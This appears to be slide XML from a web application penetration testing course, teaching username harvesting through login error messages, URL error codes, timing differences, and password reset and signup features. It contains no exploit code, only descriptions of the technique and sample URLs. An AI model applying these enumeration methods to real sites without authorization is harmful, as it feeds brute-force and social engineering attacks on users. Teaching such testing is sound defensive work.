              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Command Injection Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Directory Traversal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> SQL Injection Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Blind SQL Injection</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latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Username Harvesting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94211" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="563880" y="1691640"/>
            <a:ext cx="8001000" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Username harvesting allows us to collect valid user names</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Multiple uses for the collected user names</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Brute force passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Social engineering attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Authorization bypass attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Uses error handling to determine if a username is valid</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Site returns different response</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>If user name is wrong</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>If password is wrong</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228600" y="289560"/>
            <a:ext cx="8686800" cy="838200"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Username Harvesting through </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Login Error Messages</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="95235" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1737360"/>
            <a:ext cx="8077200" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>One of the simpler forms is when the application displays  a "Bad Username" error is the user does not exist</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>It then displays "Incorrect Password" if the username is correct and the password is incorrect</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Remember that we can use the user names that we were provided as part of our test set up</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We use one of our valid accounts and mistype the password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We then put in a completely bogus username</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dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Username Harvesting through </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>URL-based Errors</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96259" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>A second type of harvesting can happen with url-based error codes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>User enters wrong username</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>http://target.tld/login.php?error=1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>User enters incorrect password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>http://target.tld/login.php?error=2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>As we can see the different error codes reveal valid usernames</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>A second issue is the potential to iterate through the codes 1-1000000? and see what other errors are visible</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a:xfrm>
            <a:off x="219075" y="137160"/>
            <a:ext cx="8734425" cy="1175273"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Other Issues that Cause </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Username Harvesting </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="97283" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Page Differences in the two test cases</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Content changes could be different HTML tags or even spacing on the page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Tools such as Burp Comparer can find these differences</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Timing differences between the two test cases</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Usually caused when two queries are used</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>One query to verify the user name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Second query to retrieve the valid user name's password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Not very common in modern application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title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="219075" y="137160"/>
            <a:ext cx="8734425" cy="1175273"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Creating Custom Scripts for Penetration Testing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11266" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1615440"/>
            <a:ext cx="8458200" cy="4191000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Web app pen testers often create custom scripts to use during a test</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Especially during this vulnerability discovery phase</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>These scripts can be used for many different testing and exploitation purposes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Parse through web content to find specific data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Harvest user names from an application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Iterate through page IDs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Many scripting languages support HTTP requests and text processing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Perl, Ruby, Python, and more are all good examples</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We recommend that if you know a given language already, use it</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
              <a:cs typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>If you don't or you just want to expand your skills, learn Python</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Most new tools are being written in Python, so this knowledge will also help you expand and fix tools you may very likely use in your tests</a:t>
            </a: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r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Harvesting Areas</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="98307" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We can look anywhere usernames are accepted to find harvesting issues</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Typically login fields are checked</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>But others exist including:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Password Reset</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Enter a user name and the system tells us if we can reset a password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Password Recovery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Web site will e-mail the password to the user, if we enter a valid user name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>User Signup</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Some are even AJAXified to allow us to check the availability of a user name!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Messaging Systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Intra-site messaging systems are a great place to verify user names, once we have an account</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219075" y="137160"/>
            <a:ext cx="8734425" cy="1175273"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Testing Methods to Discover Username Harvesting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="99331" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1645920"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Manually trying usernames</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Very slow, but great for the initial discovery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Building a script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>This can be used to find the issue, but is more commonly used to retrieve the names once the issue is found</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>This requires us to have:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Command line web tools (typically custom scripts)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Lists of potential user names</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Census data is a great place to find popular names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041"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Course Roadmap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 1042"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="1905000"/>
            <a:ext cx="8458200" cy="4419600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Attacker's View of </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
